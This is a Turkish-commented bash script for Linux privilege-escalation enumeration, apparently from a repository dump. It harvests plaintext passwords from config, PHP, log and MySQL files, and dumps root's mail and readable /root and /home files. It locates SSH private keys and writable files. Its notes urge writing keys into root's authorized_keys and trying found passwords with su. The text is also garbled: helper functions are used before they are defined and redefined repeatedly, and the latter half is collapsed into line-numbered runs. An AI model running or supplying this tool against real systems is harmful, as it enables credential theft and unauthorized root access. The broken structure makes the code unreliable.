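printf 'ICINDE HISTORY GECEN DIZIN VEYA DOSYALARIN LISTESI'
_enum_rule
grep -i -E 'history' dirlist-enum.txt | xargs -r ls -al 2>/dev/null
_enum_rule
printf 'MY.CNF ADLI DOSYALARIN LISTESI'
_enum_rule
grep -i -E 'my\.cnf$' dirlist-enum.txt | xargs -r ls -al 2>/dev/null
_enum_rule
printf 'MY.CONF ADLI DOSYALARIN LISTESI'
_enum_rule
grep -i -E 'my\.conf$' dirlist-enum.txt | xargs -r ls -al 2>/dev/null

# Lines that look like stored credentials, searched per list file. The eight
# searches share one pattern, so they run from a single loop. Anything this
# prints is a plaintext secret at rest and the report must be handled as such.
_enum_rule
printf '==OZET PASSWORD SATIRLARI=='
_enum_rule
_enum_cred_re='pass =|passwd =|pwd =| password =|user =|username =|pass=|passwd=|pwd=|password=|user=|username=|mysql_connect|mysql_select_db'
for _enum_entry in INI:ini CONF:conf PHP:php PERL:pl SH:sh LOG:log INC:inc MYD:myd; do
    _enum_label=${_enum_entry%%:*}
    _enum_list=${_enum_entry#*:}-files-enum.txt
    _enum_rule
    printf '%s' "$_enum_label DOSYALARI ICINDE GECEN PASSWORD VE USERNAME SATIRLARI"
    _enum_rule
    cat "$_enum_list" | xargs -r grep -i -E "$_enum_cred_re" 2>/dev/null
done
_enum_rule

# Heading and note for the /etc *.conf* permission listing that follows.
printf '/ETC DIZINI ALTINDA SONU .CONF* ILE BITEN DOSYALARIN LISTESI VE
ERISIM HAKLARI - find /etc/ -maxdepth 4 -name *.conf* -type f -exec ls -la {}
\;'
printf '\nNOT: Belli bir isim yapisindaki dosyalarin erisim haklarini
listelemek icin dirlist-enum.txt dosyasinden filtrelenmis dosya adlarini
kullanabiliriz.'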
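# Separator printed between report sections.
_enum_rule() { printf '\n*******************************************************\n'; }

printf '\nOrnegin: cat ini-files-enum.txt | xargs ls -al komutuyla sonu ini
ile biten dosyalarin erisim haklarinin listelenmesi gibi'
_enum_rule
# The pattern is quoted so find receives it literally. Unquoted, the shell
# expanded *.conf* against the current directory first, which changed or
# broke the search whenever a matching file happened to be there.
find /etc/ -maxdepth 4 -name '*.conf*' -type f -exec ls -la {} \; 2>/dev/null
_enum_rule

# Contents of root's mailbox and of common service configuration files, each
# under an "ICERIK - <path>" heading. Unreadable or absent files print nothing.
for _enum_file in \
    /var/mail/root \
    /var/spool/mail/root \
    /etc/syslog.conf \
    /etc/chttp.conf \
    /etc/lighttpd.conf \
    /etc/cups/cupsd.conf \
    /etc/inetd.conf
do
    printf 'ICERIK - %s' "$_enum_file"
    _enum_rule
    cat "$_enum_file" 2>/dev/null
    _enum_rule
done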
# Separator printed between report sections.
_enum_rule() { printf '\n*******************************************************\n'; }

# Print an "ICERIK - <heading>" section followed by the contents of each file
# named after it. Runs in a subshell so its variables stay out of the script.
_enum_show() (
    heading=$1
    shift
    printf '%s' "ICERIK - $heading"
    _enum_rule
    for path in "$@"; do
        cat "$path" 2>/dev/null
    done
    _enum_rule
)

# Web and database server configuration, the MySQL user table file and the
# installer kickstart file. Several of these can hold credentials, so being
# able to read them from an unprivileged account is itself worth recording.
_enum_show '/etc/apache2/apache2.conf' /etc/apache2/apache2.conf
_enum_show '/etc/mysql/my.cnf ve /etc/my.cnf' /etc/mysql/my.cnf /etc/my.cnf
_enum_show '/etc/my.conf' /etc/my.conf
_enum_show '/etc/httpd/conf/httpd.conf' /etc/httpd/conf/httpd.conf
_enum_show '/opt/lampp/etc/httpd.conf' /opt/lampp/etc/httpd.conf
_enum_show '/var/apache2/config.inc' /var/apache2/config.inc
_enum_show '/var/lib/mysql/mysql/user.MYD' /var/lib/mysql/mysql/user.MYD
_enum_show '/root/anaconda-ks.cfg' /root/anaconda-ks.cfg
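# Separator printed between report sections.
_enum_rule() { printf '\n*******************************************************\n'; }

# Account running the audit, resolved once for the ownership tests below.
_enum_me=$(whoami)

# Files this account can write but does not own (everything under /proc skipped).
printf 'KULLANICIMIZA AIT OLMAYAN ANCAK YAZMA HAKKIMIZ OLAN TUM DOSYALARIN
LISTESI VE ERISIM HAKLARI - find / -writable -not -user whoami -type f -not -
path /proc/* -exec ls -al {} \;'
_enum_rule
find / -writable -not -user "$_enum_me" -type f -not -path "/proc/*" -exec ls -al {} \; 2>/dev/null

# World-writable regular files.
_enum_rule
printf 'TUM WORLD WRITABLE DOSYALARIN LISTESI VE ERISIM HAKLARI - find / ! -
path */proc/* -perm -2 -type f -exec ls -al {} \;'
_enum_rule
find / ! -path "*/proc/*" -perm -2 -type f -exec ls -al {} \; 2>/dev/null

# World-writable directories.
_enum_rule
printf 'HERKESIN YAZABILECEGI DIZINLERIN LISTESI'
_enum_rule
find / -type d -not -path "/proc/*" \( -perm -o+w \) -exec ls -ald {} \; 2>/dev/null

# Directories writable by this account.
_enum_rule
printf 'BIZIM YAZABILECEGIMIZ DIZINLERIN LISTESI - find / -writable -type d -
not -path /proc/* -exec ls -al {} \;'
printf '\nManuel olarak script lerimizi ve ciktilarini yerlestirebilecegimiz
bir dizin bulmak icin de kullanilabilir'
_enum_rule
find / -writable -type d -not -path "/proc/*" -exec ls -ald {} \; 2>/dev/null

# Directories owned by this account.
_enum_rule
printf 'KULLANICIMIZA AIT DIZINLERIN LISTESI - find / -user whoami -type d - not -path /proc/* -exec ls -al {} \;'
_enum_rule
find / -user "$_enum_me" -type d -not -path "/proc/*" -exec ls -ald {} \; 2>/dev/null

# SSH key material and trust files visible to this account. Private keys that
# another user can read are a finding.
_enum_rule
printf 'SSH ANAHTAR VE ANAHTAR DIZINLERININ LISTESI - find / -name id_dsa* -o
-name id_rsa* -o -name known_hosts -o -name authorized_hosts -o -name
authorized_keys: Ozel ve acik anahtar kavramlari ile bunlarin SSH da nasil
kullanıldigi ile ilgili on bilgi edinmenizde fayda var'
_enum_rule
find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null

# Effective PermitRootLogin value: lines containing '#' are dropped and the
# second field of what remains is printed. The '#' is matched as a plain
# character; the former '\#' is an undefined escape that newer grep versions
# warn about on stderr.
_enum_rule
printf 'SSH SERVISINE ROOT KULLANICISI OLARAK BAGLANABILIR MIYIZ - grep
PermitRootLogin /etc/ssh/sshd_config 2>/dev/null | grep -v | awk {print
$2}: Gecerli degerler yes, without-password, forced-commands-only, veya no
dur. without-password private key ile erisilebilir anlamina gelir. forcedcommands-only
yapilabilecek islemleri kisitlar ve private key ile
gelinmelidir.'
_enum_rule
grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v '#' | awk '{print $2}'

# Permissions on the sshd configuration directory.
_enum_rule
printf 'SSH KONFIGURASYON DIZINI ERISIM HAKLARIMIZ - ls -la /etc/ssh/'
printf '\nBu baglamda root un home dizinindeki authorized keys dizinine
yazabiliyorsak asagidaki linklerden faydalanarak sirasiyla key uretebilir ve
yerlestirebiliriz'
printf '\nhttp://www.thegeekstuff.com/2008/11/3-steps-to-perform-ssh-loginwithout-password-using-ssh-keygen-ssh-copy-id/'
printf '\nhttp://www.rebol.com/docs/ssh-auto-login.html'
_enum_rule
ls -la /etc/ssh/ 2>/dev/null

# Heading for the login-shell listing; the command itself follows this point.
_enum_rule
printf 'SHELL UYGULAMALARININ LISTESI - cat /etc/shells'
_enum_rule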
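# Separator printed between report sections.
_enum_rule() { printf '\n*******************************************************\n'; }

# Permissions of every login shell named in /etc/shells (its heading was
# printed just before this point). Comment lines are removed first, and
# `xargs -r` keeps ls from listing the current directory when nothing is left.
grep -v '^#' /etc/shells 2>/dev/null | xargs -r ls -al 2>/dev/null

# PATH of the account running the audit, printed without word splitting or
# glob expansion.
_enum_rule
printf 'KULLANICIMIZIN PATH CEVRESEL DEGISKENI - echo $PATH'
_enum_rule
printf '%s\n' "$PATH"

# Password ageing and hashing policy.
_enum_rule
printf 'PAROLA POLITIKASI, PAROLA HASH ALGORITMASI V.D. BILGILER - cat
/etc/login.defs'
_enum_rule
cat /etc/login.defs 2>/dev/null

# Account and group Apache is configured to run as. The awk pattern is written
# as plain "export": the former "\export" holds an undefined escape that some
# awk implementations warn about.
_enum_rule
printf 'APACHE PROCESS ININ HANGI KULLANICI OLARAK KONFIGURE EDILDIGI - cat
/etc/apache2/envvars 2>/dev/null |grep -i user\|group |awk {sub(/.*\export
/,)}1 Gercek kullanici bilgisine ps aux ciktisindan erisebiliriz'
_enum_rule
cat /etc/apache2/envvars 2>/dev/null | grep -i 'user\|group' | awk '{sub(/.*export /,"")}1'

# .rhosts trust files under the home directories. The pattern is quoted so the
# shell cannot expand it against the current directory before find sees it.
_enum_rule
printf 'GOREBILDIGIMIZ TUM HOME DIZINLERI ALTINDA VARSA RHOSTS DOSYALARI -
find /home -iname *.rhosts -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;'
_enum_rule
find /home -iname '*.rhosts' -exec ls -la {} \; -exec cat {} \; 2>/dev/null

# Same search for systems that keep home directories under /usr/home.
_enum_rule
printf 'EGER HOME DIZINLERI /USR/ DIZINI ALTINDA ISE GOREBILDIGIMIZ HOME
DIZINLERI ALTINDA VARSA RHOSTS DOSYALARI - find /usr/home -iname *.rhosts -
exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;'
_enum_rule
find /usr/home -iname '*.rhosts' -exec ls -la {} \; -exec cat {} \; 2>/dev/null
_enum_rule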
591 | printf 'HOSTS.EQUIV DOSYASININ ERISIM HAKKI VE GOREBILIYORSAK ICERIGI - find 592 | /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 593 | 2>/dev/null \;' 594 | printf '\n*******************************************************\n' 595 | find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \; 596 | printf '\n*******************************************************\n' 597 | printf 'EXPORTS DOSYASININ ERISIM HAKLARI - ls -la /etc/exports' 598 | printf '\n*******************************************************\n' 599 | ls -la /etc/exports 2>/dev/null 600 | printf '\n*******************************************************\n' 601 | printf 'OKUYABILIYORSAK EXPORTS DOSYASININ ICERIGI - cat /etc/exports' 602 | printf '\n*******************************************************\n' 603 | cat /etc/exports 2>/dev/null 604 | printf '\n*******************************************************\n' 605 | printf 'VARSA /VAR/MAIL DIZINI ALTINDAKI DOSYALAR VE ERISIM HAKLARI - ls -la 606 | /var/mail - Bu dosyalara manuel olarak bakmak gerekebilir' 607 | printf '\n*******************************************************\n' 608 | ls -la /var/mail 2>/dev/null 609 | printf '\n*******************************************************\n' 610 | printf 'VARSA /VAR/SPOOL/MAIL DIZINI ALTINDAKI DOSYALAR VE ERISIM HAKLARI - 611 | ls -la /var/spool/mail - Bu dosyalara manuel olarak bakmak gerekebilir' 612 | printf '\n*******************************************************\n' 613 | ls -la /var/spool/mail 2>/dev/null 614 | printf '\n*******************************************************\n' 615 | printf 'VARSA VE OKUYABILIYORSAK ROOT UN MAIL KUTUSUNUN ILK BOLUMU - head 616 | /var/mail/root' 617 | printf '\n*******************************************************\n' 618 | head /var/mail/root 2>/dev/null 619 | printf '\n*******************************************************\n' 620 | printf 'VARSA VE OKUYABILIYORSAK ROOT UN MAIL KUTUSUNUN ILK BOLUMU - head 
621 | /var/spool/mail/root' 622 | printf '\n*******************************************************\n' 623 | head /var/spool/mail/root 2>/dev/null 624 | printf '\n*******************************************************\n' 625 | printf 'INETD DOSYASININ ICERIGI - cat /etc/inetd.conf - otomatik baslatilan 626 | ag servisleri icin' 627 | printf '\n*******************************************************\n' 628 | cat /etc/inetd.conf 2>/dev/null 629 | printf '\n*******************************************************\n' 630 | printf 'TCP WRAPPER UYGULAYAN SISTEMLER ICIN XINETD DOSYASININ ICERIGI - cat 631 | /etc/xinetd.conf' 632 | printf '\n*******************************************************\n' 633 | cat /etc/xinetd.conf 2>/dev/null 634 | printf '\n*******************************************************\n' 635 | printf 'INIT.D DIZINI ALTINDAKI SCRIPTLER VE ERISIM IZINLERI - ls -la 636 | /etc/init.d - linux uzerine kurulmus servisler hakkinda fikir verir, buradaki 637 | scriptlerin hepsi calismiyor olabilir. Bu dosyalar icinde grep ile kelime 638 | aranabilir' 639 | printf '\n*******************************************************\n' 640 | ls -la /etc/init.d 2>/dev/null 641 | printf '\n*******************************************************\n' 642 | printf 'DUSUK BIR IHTIMAL AMA INIT SCRIPTLERI ICINDE BIR PAROLA OLABILIR MI' 643 | printf '\n*******************************************************\n' 644 | ls /etc/init.d 2>/dev/null| xargs grep -i -E 'pass =|passwd =|pwd =| password =|pass=|passwd=|pwd=|password=' 2>/dev/null 645 | printf '\n*******************************************************\n' 646 | printf 'ROOT KULLANICISINA AIT OLMAYAN ANCAK INIT.D DIZINI ALTINDA BULUNAN 647 | DOSYALARIN LISTESI - find /etc/init.d/ \! -uid 0 -type f 2>/dev/null |xargs - 648 | r ls -la 2>/dev/null' 649 | printf '\n*******************************************************\n' 650 | find /etc/init.d/ \! 
-uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null 651 | printf '\n*******************************************************\n' 652 | printf 'INIT SCRIPTLERI RC.D DIZINLERI ALTINDA BULUNAN SISTEMLER ICIN INIT 653 | SCRIPTLERI LISTESI VE ERISIM HAKLARI - ls -la /etc/rc.d/init.d' 654 | printf '\n*******************************************************\n' 655 | ls -la /etc/rc.d/init.d 2>/dev/null 656 | printf '\n*******************************************************\n' 657 | printf 'ROOT KULLANICISINA AIT OLMAYAN ANCAK RC.D/INIT.D DIZINI ALTINDA 658 | BULUNAN DOSYALARIN LISTESI - find /etc/rc.d/init.d \! -uid 0 -type f 659 | 2>/dev/null |xargs -r ls -la 2>/dev/null' 660 | printf '\n*******************************************************\n' 661 | find /etc/rc.d/init.d \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null 662 | printf '\n*******************************************************\n' 663 | printf 'MOUNT KONFIGURASYONU - cat /etc/fstab *** ONEMLI - REISERFS GIBI 664 | SIRADISI FILE SYSTEM GORURSENIZ EXPLOIT ETMEYI DENEYIN' 665 | printf '\n*******************************************************\n' 666 | cat /etc/fstab 2>/dev/null 667 | printf '\n=======================================================' 668 | printf '\nEK BILGI' 669 | printf '\n=======================================================' 670 | printf '\n*******************************************************\n' 671 | printf 'TUM AG ARAYUZLERININ LISTESI - /sbin/ifconfig -a' 672 | printf '\n*******************************************************\n' 673 | /sbin/ifconfig -a 674 | printf '\n*******************************************************\n' 675 | printf 'SUNUCUDA TANIMLI ROUTE BILGILERI - route' 676 | printf '\n*******************************************************\n' 677 | /sbin/route 2>/dev/null 678 | printf '\n*******************************************************\n' 679 | printf 'MOUNT EDILMIS PARTITION LAR - mount' 680 | printf 
'\n*******************************************************\n' 681 | mount 2>/dev/null 682 | printf '\n*******************************************************\n' 683 | printf 'MOUNT EDILMIS PARTITION LAR VE KULLANIM ORANLARI - df -h' 684 | printf '\n*******************************************************\n' 685 | df -h 2>/dev/null 686 | printf '\n*******************************************************\n' 687 | printf 'DOSYA TRANSFER ARACLARIMIZ NELER' 688 | printf '\nNOT: Path cevresel degiskenimiz yeterli degilse which komutlari var 689 | oldugu halde dosya transfer araclarini bulamayabilir, bu bolumdeki ciktilari 690 | bu acidan degerlendirmelisiniz.' 691 | printf '\n*******************************************************\n' 692 | which nc 693 | which netcat 694 | which wget 695 | which tftp 696 | which ftp 697 | printf '\n*******************************************************\n' 698 | printf 'KURULU PAKETLER VE VERSIYONLARI' 699 | printf '\n*******************************************************\n' 700 | if grep -q -E -i 'ubuntu|debian' /proc/version; 701 | then 702 | dpkg -l 2>/dev/null 703 | else 704 | rpm -qa 2>/dev/null 705 | fi 706 | printf '\n*******************************************************\n' 707 | printf 'WEB UYGULAMA DIZINLERI VE DOSYALARIN LISTESI - EKLEME YAPILABILIR' 708 | printf 'NOT: Bu dizinlere manuel olarak goz atilmalidir' 709 | printf '\n*******************************************************\n' 710 | ls -alhR /var/www/ 2>/dev/null 711 | ls -alhR /srv/www/htdocs/ 2>/dev/null 712 | ls -alhR /usr/local/www/apache22/data/ 2>/dev/null 713 | ls -alhR /opt/lampp/htdocs/ 2>/dev/null 714 | printf '\n*******************************************************\n' 715 | printf '==DETAYLI PASSWORD VE ROOT KELIMELERI GECEN SATIRLAR==' 716 | printf '\n*******************************************************\n' 717 | printf '\n*******************************************************\n' 718 | printf 'INI DOSYALARI ICINDE PASS, PWD, ROOT VE ADMIN KELIMELERI 
GECEN 719 | SATIRLAR - cat ini-files-enum.txt | xargs grep -E pass|pwd|root' 720 | printf '\nNOT: grep ile aranan kelimelerin gectigi satirlar yerine sadece bu 721 | kelimelerin gectigi dosyalari gormek istiyorsaniz grep -l komutunu 722 | kullanabilirsiniz' 723 | printf '\nNOT: Manuel olarak belli kelimeleri belli dosyalar icinde aramak 724 | icin su komut kullanilabilir, arama terimlerini tek tirnak icine almayi 725 | unutmayiniz: find / -name *.conf* -type f -exec grep -Hn password|root {} \; 726 | 2>/dev/null ' 727 | printf '\n*******************************************************\n' 728 | cat ini-files-enum.txt | xargs grep -i -E 'pass|pwd|root|admin' 2>/dev/null | grep '=' 729 | printf '\n*******************************************************\n' 730 | printf 'CONF DOSYALARI ICINDE PASS, PWD, ROOT VE ADMIN KELIMELERI GECEN 731 | SATIRLAR - cat conf-files-enum.txt | xargs grep -E pass|pwd|root' 732 | printf '\n*******************************************************\n' 733 | cat conf-files-enum.txt | xargs grep -i -E 'pass|pwd|root|admin' 2>/dev/null | grep '=' 734 | printf '\n*******************************************************\n' 735 | printf 'PHP DOSYALARI ICINDE PASS, PWD, ROOT VE ADMIN KELIMELERI GECEN 736 | SATIRLAR - cat php-files-enum.txt | xargs grep -E pass|pwd|rootr' 737 | printf '\n*******************************************************\n' 738 | cat php-files-enum.txt | xargs grep -i -E 'pass|pwd|root|admin' 2>/dev/null | grep '=' 739 | printf '\n*******************************************************\n' 740 | printf 'PL DOSYALARI ICINDE PASS, PWD, ROOT VE ADMIN KELIMELERI GECEN 741 | SATIRLAR - cat pl-files-enum.txt | xargs grep -E pass|pwd|root' 742 | printf '\n*******************************************************\n' 743 | cat pl-files-enum.txt | xargs grep -i -E 'pass|pwd|root|admin' 2>/dev/null | grep '=' 744 | printf '\n*******************************************************\n' 745 | printf 'SH DOSYALARI ICINDE PASS, PWD, ROOT VE ADMIN 
KELIMELERI GECEN 746 | SATIRLAR - cat sh-files-enum.txt | xargs grep -E pass|pwd|root' 747 | printf '\n*******************************************************\n' 748 | cat sh-files-enum.txt | xargs grep -i -E 'pass|pwd|root|admin' 2>/dev/null | grep '=' 749 | printf '\n*******************************************************\n' 750 | printf 'LOG DOSYALARI ICINDE PASS, PWD, ROOT VE ADMIN KELIMELERI GECEN 751 | SATIRLAR - cat log-files-enum.txt | xargs grep -E pass|pwd|root' 752 | printf '\n*******************************************************\n' 753 | cat log-files-enum.txt | xargs grep -i -E 'pass|pwd|root|admin' 2>/dev/null | grep '=' 754 | printf '\n*******************************************************\n' 755 | printf 'INC DOSYALARI ICINDE PASS, PWD, ROOT VE ADMIN KELIMELERI GECEN 756 | SATIRLAR - cat inc-files-enum.txt | xargs grep -E pass|pwd|root' 757 | printf '\n*******************************************************\n' 758 | cat inc-files-enum.txt | xargs grep -i -E 'pass|pwd|root|admin' 2>/dev/null | grep '=' 759 | printf '\n*******************************************************\n' 760 | printf 'MYD DOSYALARI ICINDE PASS, PWD, ROOT VE ADMIN KELIMELERI GECEN 761 | SATIRLAR - cat myd-files-enum.txt | xargs grep -E pass|pwd|root' 762 | printf '\n*******************************************************\n' 763 | cat myd-files-enum.txt | xargs grep -i -E 'pass|pwd|root|admin' 2>/dev/null | grep '=' 764 | printf '\n*******************************************************\n' 765 | printf '/root/ DIZINI ALTINDA OKUYABILDIGIMIZ DOSYALARIN ICERIKLERI' 766 | printf '\n*******************************************************\n' 767 | find /root/ -type f -exec tail -n +1 {} + > rootfiles-enum.txt 2>/dev/null 768 | printf '\n*******************************************************\n' 769 | printf '/home/ DIZINI ALTINDA OKUYABILDIGIMIZ DOSYALARIN ICERIKLERI - 770 | ***ONEMLI*** EGER SCRIPTI HOME DIZINI ALTINDA CALISTIRIRSANIZ KENDINIZE DOS 771 | YAPMIS OLURSUNUZ CUNKU 
SCRIPT KENDI YAZDIKLARINI TEKRAR OKUYUP TEKRAR YAZAR 772 | VE DISKI DOLDURURSUNUZ' 773 | printf '\n*******************************************************\n' 774 | find /home/ -type f -exec tail -n +1 {} + > homefiles-enum.txt 2>/dev/null 775 | printf '\n*******************************************************\n' 776 | printf '/etc/cron* DIZINLERI ALTINDA OKUYABILDIGIMIZ DOSYALARIN ICERIKLERI' 777 | printf '\n*******************************************************\n' 778 | find /etc/cron* -type f -exec tail -n +1 {} + > etccronfiles-enum.txt 2>/dev/null 779 | printf '\n=======================================================' 780 | printf '\nSCRIPT TAMAMLANDI' 781 | printf '\n=======================================================' 782 | printf '\nBULDUGUNUZ PAROLALARI ROOT KULLANICISINA VE SISTEM UZERINDE TANIMLI 783 | DIGER KULLANICILARA SU YAPARAK DENEMEYI UNUTMAYIN\n' 784 | 785 | -------------------------------------------------------------------------------- /nops.xsl: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 8 | 617 | 618 | --------------------------------------------------------------------------------